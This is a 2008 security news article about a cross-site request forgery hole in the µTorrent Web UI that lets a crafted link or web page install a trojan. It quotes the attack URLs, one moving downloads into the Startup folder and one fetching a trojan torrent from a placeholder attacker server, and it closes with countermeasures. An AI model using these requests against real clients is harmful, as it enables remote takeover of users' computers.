In association with heise online

21 April 2008, 16:41

Computer takeover via cross site request forgery

  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit

Security expert Billy Rios has reported a vulnerability that Rob Carter discovered in the Web UI of the popular µTorrent BitTorrent client. Attackers can use the vulnerability to take complete control over a system using a manipulated email or website. The the vulnerability stems from a cross-site request forgery (CSRF) in which web sites containing crafted links, either in JavaScript or in <IMG> tags, access other websites. The malicious site can then make configuration changes using the access rights of the victim.

In the past, CSRF attacks have been used to change a user's router configuration to make it use a manipulated DNS server. However, the hole that Carter found allows a trojan to be installed directly onto the victim's computer.

Carter's attack is performed in several stages. The first link changes the configuration of µTorrent, causing it to move completed downloads to an alternative directory:


Then it changes the path to which completed downloads are moved:

http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:\Doc uments%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup

That moves downloaded files into the autostart folder for every user on the system. Now the attacker can use a third link to initiate download of a Trojan, which is executed once the computer is restarted and a user logs in:

http://localhost:14774/gui/?action=add-rl&s= http://boeser.server.domain/trojaner.torrent

Countermeasures against such a CSRF attack could include requiring a password every time configuration changes are made or using a session ID, which must not however be stored in a cookie.

µTorrent web UI plug-in users should, at the very least, change the standard port that the interface listens on. They should also immediately log out of the interface following any changes to it. The safest course is simply not to use the plug-in at all until the developers offer a patched version of it for download.

See also:


Print Version | Send by email | Permalink:

  • July's Community Calendar

The H Open

The H Security

The H Developer

The H Internet Toolkit